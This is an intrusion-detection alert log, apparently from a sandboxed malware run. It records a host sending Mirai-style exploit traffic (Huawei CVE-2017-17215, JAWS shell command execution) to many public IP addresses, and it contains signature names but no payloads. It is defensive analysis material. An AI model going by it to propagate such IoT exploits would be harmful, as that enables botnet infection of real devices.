                                                2024-12-03T22:17:16.023994+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335002197.81.175.20637215TCP
                                                2024-12-03T22:17:16.055204+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344256156.219.192.22337215TCP
                                                2024-12-03T22:17:16.070804+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234299282.147.27.11380TCP
                                                2024-12-03T22:17:16.070804+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234299282.147.27.11380TCP
                                                2024-12-03T22:17:16.071063+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359154208.52.232.3180TCP
                                                2024-12-03T22:17:16.071063+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359154208.52.232.3180TCP
                                                2024-12-03T22:17:16.087125+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344398150.222.20.6580TCP
                                                2024-12-03T22:17:16.087125+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344398150.222.20.6580TCP
                                                2024-12-03T22:17:16.087207+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235802242.222.254.7080TCP
                                                2024-12-03T22:17:16.087207+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235802242.222.254.7080TCP
                                                2024-12-03T22:17:16.150101+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346118197.98.23.1780TCP
                                                2024-12-03T22:17:16.150101+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346118197.98.23.1780TCP
                                                2024-12-03T22:17:16.265228+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23538102.126.27.22080TCP
                                                2024-12-03T22:17:16.265228+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23538102.126.27.22080TCP
                                                2024-12-03T22:17:16.280738+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333390166.205.84.5280TCP
                                                2024-12-03T22:17:16.280738+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333390166.205.84.5280TCP
                                                2024-12-03T22:17:16.305173+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353538100.53.164.4980TCP
                                                2024-12-03T22:17:16.305173+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353538100.53.164.4980TCP
                                                2024-12-03T22:17:16.336304+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235278219.2.6.11580TCP
                                                2024-12-03T22:17:16.336304+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235278219.2.6.11580TCP
                                                2024-12-03T22:17:16.351869+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336912148.28.111.15780TCP
                                                2024-12-03T22:17:16.351869+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336912148.28.111.15780TCP
                                                2024-12-03T22:17:16.733571+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347612210.159.47.4780TCP
                                                2024-12-03T22:17:16.733571+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347612210.159.47.4780TCP
                                                2024-12-03T22:17:16.748899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344106211.28.212.8180TCP
                                                2024-12-03T22:17:16.748899+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344106211.28.212.8180TCP
                                                2024-12-03T22:17:16.820733+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344492178.212.220.2680TCP
                                                2024-12-03T22:17:16.820733+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344492178.212.220.2680TCP
                                                2024-12-03T22:17:16.842698+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235113441.72.40.18637215TCP
                                                2024-12-03T22:17:16.842888+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337630156.127.117.24837215TCP
                                                2024-12-03T22:17:16.873950+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354208156.173.48.637215TCP
                                                2024-12-03T22:17:16.874291+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350414156.142.216.1937215TCP
                                                2024-12-03T22:17:16.889567+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353894197.125.185.13337215TCP
                                                2024-12-03T22:17:16.889720+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350260156.110.116.19237215TCP
                                                2024-12-03T22:17:16.946143+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338364156.30.63.2537215TCP
                                                2024-12-03T22:17:16.967815+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345572156.234.118.11537215TCP
                                                2024-12-03T22:17:16.967895+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360136156.138.215.21037215TCP
                                                2024-12-03T22:17:17.014825+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340734197.236.127.1937215TCP
                                                2024-12-03T22:17:17.039542+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235384641.195.129.20137215TCP
                                                2024-12-03T22:17:17.039545+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355242197.199.156.637215TCP
                                                2024-12-03T22:17:17.039728+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357052197.36.67.9537215TCP
                                                2024-12-03T22:17:17.045964+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234193666.167.139.23980TCP
                                                2024-12-03T22:17:17.045964+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234193666.167.139.23980TCP
                                                2024-12-03T22:17:17.054985+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235564041.48.156.16737215TCP
                                                2024-12-03T22:17:17.061478+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347198102.244.213.780TCP
                                                2024-12-03T22:17:17.061478+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347198102.244.213.780TCP
                                                2024-12-03T22:17:17.092523+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350584165.204.23.19280TCP
                                                2024-12-03T22:17:17.092523+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350584165.204.23.19280TCP
                                                2024-12-03T22:17:17.101887+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356618119.163.95.20080TCP
                                                2024-12-03T22:17:17.101887+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356618119.163.95.20080TCP
                                                2024-12-03T22:17:17.102077+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234652063.186.73.22880TCP
                                                2024-12-03T22:17:17.102077+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234652063.186.73.22880TCP
                                                2024-12-03T22:17:17.876887+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233628682.117.212.1180TCP
                                                2024-12-03T22:17:17.876887+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233628682.117.212.1180TCP
                                                2024-12-03T22:17:17.905034+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349166207.31.188.480TCP
                                                2024-12-03T22:17:17.905034+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349166207.31.188.480TCP
                                                2024-12-03T22:17:17.936507+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338642129.65.108.22080TCP
                                                2024-12-03T22:17:17.936507+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338642129.65.108.22080TCP
                                                2024-12-03T22:17:17.945749+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336528173.92.73.2880TCP
                                                2024-12-03T22:17:17.945749+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336528173.92.73.2880TCP
                                                2024-12-03T22:17:17.967854+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235507620.46.92.8380TCP
                                                2024-12-03T22:17:17.967854+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235507620.46.92.8380TCP
                                                2024-12-03T22:17:18.061653+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349278209.24.153.15780TCP
                                                2024-12-03T22:17:18.061653+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349278209.24.153.15780TCP
                                                2024-12-03T22:17:18.070964+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359224155.1.144.080TCP
                                                2024-12-03T22:17:18.070964+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359224155.1.144.080TCP
                                                2024-12-03T22:17:18.071017+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348634206.130.193.3180TCP
                                                2024-12-03T22:17:18.071017+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348634206.130.193.3180TCP
                                                2024-12-03T22:17:18.327276+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349590157.22.181.3680TCP
                                                2024-12-03T22:17:18.327276+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349590157.22.181.3680TCP
                                                2024-12-03T22:17:18.359862+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342842196.188.148.7680TCP
                                                2024-12-03T22:17:18.359862+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342842196.188.148.7680TCP
                                                2024-12-03T22:17:19.024060+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358934156.136.30.8337215TCP
                                                2024-12-03T22:17:19.030400+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357838197.205.167.25037215TCP
                                                2024-12-03T22:17:19.061405+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359332155.118.130.19380TCP
                                                2024-12-03T22:17:19.061405+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359332155.118.130.19380TCP
                                                2024-12-03T22:17:19.061488+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338904189.182.4.6180TCP
                                                2024-12-03T22:17:19.061488+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338904189.182.4.6180TCP
                                                2024-12-03T22:17:19.061677+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355200102.76.177.9980TCP
                                                2024-12-03T22:17:19.061677+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355200102.76.177.9980TCP
                                                2024-12-03T22:17:19.061895+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348552129.148.53.12280TCP
                                                2024-12-03T22:17:19.061895+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348552129.148.53.12280TCP
                                                2024-12-03T22:17:19.077017+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339834123.103.236.18480TCP
                                                2024-12-03T22:17:19.077017+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339834123.103.236.18480TCP
                                                2024-12-03T22:17:19.092855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351112154.142.82.980TCP
                                                2024-12-03T22:17:19.092855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351112154.142.82.980TCP
                                                2024-12-03T22:17:19.108780+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356648209.127.151.12480TCP
                                                2024-12-03T22:17:19.108780+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356648209.127.151.12480TCP
                                                2024-12-03T22:17:19.149301+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348718200.217.174.25480TCP
                                                2024-12-03T22:17:19.149301+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348718200.217.174.25480TCP
                                                2024-12-03T22:17:19.196043+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342506197.120.156.11937215TCP
                                                2024-12-03T22:17:19.196045+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343724197.102.235.7737215TCP
                                                2024-12-03T22:17:19.264566+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338640156.218.59.21237215TCP
                                                2024-12-03T22:17:19.295944+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233586241.43.153.4337215TCP
                                                2024-12-03T22:17:19.296135+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351316197.17.103.8637215TCP
                                                2024-12-03T22:17:19.296145+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341050197.159.147.4637215TCP
                                                2024-12-03T22:17:19.305303+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234142841.14.50.4437215TCP
                                                2024-12-03T22:17:19.342921+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360084129.211.245.2180TCP
                                                2024-12-03T22:17:19.342921+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360084129.211.245.2180TCP
                                                2024-12-03T22:17:19.343299+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337358110.248.91.16680TCP
                                                2024-12-03T22:17:19.343299+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337358110.248.91.16680TCP
                                                2024-12-03T22:17:19.351922+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236054241.208.59.23937215TCP
                                                2024-12-03T22:17:19.352131+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333892197.127.87.8537215TCP
                                                2024-12-03T22:17:19.383330+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235650039.172.171.10280TCP
                                                2024-12-03T22:17:19.383330+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235650039.172.171.10280TCP
                                                2024-12-03T22:17:20.139545+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343246197.141.228.3537215TCP
                                                2024-12-03T22:17:20.155490+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336492156.102.50.10337215TCP
                                                2024-12-03T22:17:20.155541+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345398156.209.91.20737215TCP
                                                2024-12-03T22:17:20.155636+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334020197.132.239.11037215TCP
                                                2024-12-03T22:17:20.170760+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234710641.109.98.5637215TCP
                                                2024-12-03T22:17:20.180101+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234209441.117.51.10837215TCP
                                                2024-12-03T22:17:20.186437+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348328156.7.85.12737215TCP
                                                2024-12-03T22:17:20.186569+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358618197.118.170.21037215TCP
                                                2024-12-03T22:17:20.195876+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342166197.17.71.16837215TCP
                                                2024-12-03T22:17:20.195899+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341958197.115.32.337215TCP
                                                2024-12-03T22:17:20.196050+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234694441.254.131.16337215TCP
                                                2024-12-03T22:17:20.202162+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341560156.133.251.1337215TCP
                                                2024-12-03T22:17:20.202557+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234268041.5.217.1937215TCP
                                                2024-12-03T22:17:20.211386+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337848197.103.210.19237215TCP
                                                2024-12-03T22:17:20.211546+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352378197.26.35.3937215TCP
                                                2024-12-03T22:17:20.211658+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354930156.9.30.4737215TCP
                                                2024-12-03T22:17:20.211786+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338532156.89.14.11937215TCP
                                                2024-12-03T22:17:20.227047+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235862641.34.214.8737215TCP
                                                2024-12-03T22:17:20.227366+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333948197.33.53.11037215TCP
                                                2024-12-03T22:17:20.227370+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334878156.191.123.12037215TCP
                                                2024-12-03T22:17:20.227416+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344954197.133.93.22937215TCP
                                                2024-12-03T22:17:20.227514+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333562197.144.147.13237215TCP
                                                2024-12-03T22:17:20.227649+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335912197.145.151.25037215TCP
                                                2024-12-03T22:17:20.227883+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234731441.220.241.14837215TCP
                                                2024-12-03T22:17:20.228016+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234548241.59.198.16237215TCP
                                                2024-12-03T22:17:20.436806+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359774197.150.122.14537215TCP
                                                2024-12-03T22:17:20.467969+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338814197.164.229.13937215TCP
                                                2024-12-03T22:17:20.477070+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358030197.112.51.5137215TCP
                                                2024-12-03T22:17:20.477071+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354846156.103.184.21137215TCP
                                                2024-12-03T22:17:20.477115+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234336441.45.183.25337215TCP
                                                2024-12-03T22:17:20.477239+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333108156.2.213.2937215TCP
                                                2024-12-03T22:17:22.312062+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346234156.126.205.17337215TCP
                                                2024-12-03T22:17:22.312282+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339432156.98.219.7637215TCP
                                                2024-12-03T22:17:22.320901+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360202156.244.187.19837215TCP
                                                2024-12-03T22:17:22.326997+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233375241.147.45.16137215TCP
                                                2024-12-03T22:17:22.327813+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342722197.225.68.9137215TCP
                                                2024-12-03T22:17:22.328154+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358368197.127.1.20137215TCP
                                                2024-12-03T22:17:22.328328+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234679441.179.220.25037215TCP
                                                2024-12-03T22:17:22.336394+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233325641.90.157.19737215TCP
                                                2024-12-03T22:17:22.336704+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356236156.61.1.18437215TCP
                                                2024-12-03T22:17:22.336792+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235353041.204.93.837215TCP
                                                2024-12-03T22:17:22.343088+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344924197.103.182.6737215TCP
                                                2024-12-03T22:17:22.343224+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235942641.101.114.16937215TCP
                                                2024-12-03T22:17:22.352420+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234973241.127.74.22637215TCP
                                                2024-12-03T22:17:22.352627+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344534156.69.249.25237215TCP
                                                2024-12-03T22:17:22.352636+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360458156.208.104.23337215TCP
                                                2024-12-03T22:17:22.368439+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235175641.218.179.2537215TCP
                                                2024-12-03T22:17:22.384228+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234775841.234.62.6337215TCP
                                                2024-12-03T22:17:22.468712+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341350218.240.211.5480TCP
                                                2024-12-03T22:17:22.468712+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341350218.240.211.5480TCP
                                                2024-12-03T22:17:22.477379+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235122441.235.173.5337215TCP
                                                2024-12-03T22:17:22.492687+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236014637.167.205.5980TCP
                                                2024-12-03T22:17:22.492687+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236014637.167.205.5980TCP
                                                2024-12-03T22:17:22.515252+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349350222.56.136.10380TCP
                                                2024-12-03T22:17:22.515252+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349350222.56.136.10380TCP
                                                2024-12-03T22:17:22.524892+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335830131.251.233.1280TCP
                                                2024-12-03T22:17:22.524892+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335830131.251.233.1280TCP
                                                2024-12-03T22:17:22.595115+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233908240.206.44.1280TCP
                                                2024-12-03T22:17:22.595115+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233908240.206.44.1280TCP
                                                2024-12-03T22:17:22.618027+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234909485.167.75.10780TCP
                                                2024-12-03T22:17:22.618027+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234909485.167.75.10780TCP
                                                2024-12-03T22:17:23.593603+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337580197.133.185.11137215TCP
                                                2024-12-03T22:17:23.609059+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357836156.13.114.13337215TCP
                                                2024-12-03T22:17:23.618077+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340174156.105.61.837215TCP
                                                2024-12-03T22:17:23.618370+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233343041.99.9.7837215TCP
                                                2024-12-03T22:17:23.624132+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235172841.196.239.12737215TCP
                                                2024-12-03T22:17:23.624178+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340592197.221.96.25337215TCP
                                                2024-12-03T22:17:23.639907+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235844841.206.26.23637215TCP
                                                2024-12-03T22:17:23.640102+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336116156.15.254.23337215TCP
                                                2024-12-03T22:17:23.648778+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344030197.83.152.13437215TCP
                                                2024-12-03T22:17:23.648967+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333492156.153.72.15337215TCP
                                                2024-12-03T22:17:24.389932+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235657846.179.166.16580TCP
                                                2024-12-03T22:17:24.389932+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235657846.179.166.16580TCP
                                                2024-12-03T22:17:24.648986+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335484156.118.69.16637215TCP
                                                2024-12-03T22:17:24.649265+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346742197.151.72.1437215TCP
                                                2024-12-03T22:17:25.090753+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344612197.214.201.24137215TCP
                                                2024-12-03T22:17:25.452266+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358910156.167.104.8637215TCP
                                                2024-12-03T22:17:25.467796+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340884156.59.68.1537215TCP
                                                2024-12-03T22:17:25.467948+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233716441.233.58.22637215TCP
                                                2024-12-03T22:17:25.499265+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233411227.23.244.9380TCP
                                                2024-12-03T22:17:25.499265+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233411227.23.244.9380TCP
                                                2024-12-03T22:17:25.514768+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235255841.196.234.20637215TCP
                                                2024-12-03T22:17:25.514770+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338046197.172.41.21637215TCP
                                                2024-12-03T22:17:25.514847+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356018197.20.71.8837215TCP
                                                2024-12-03T22:17:25.555492+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346992122.51.34.24580TCP
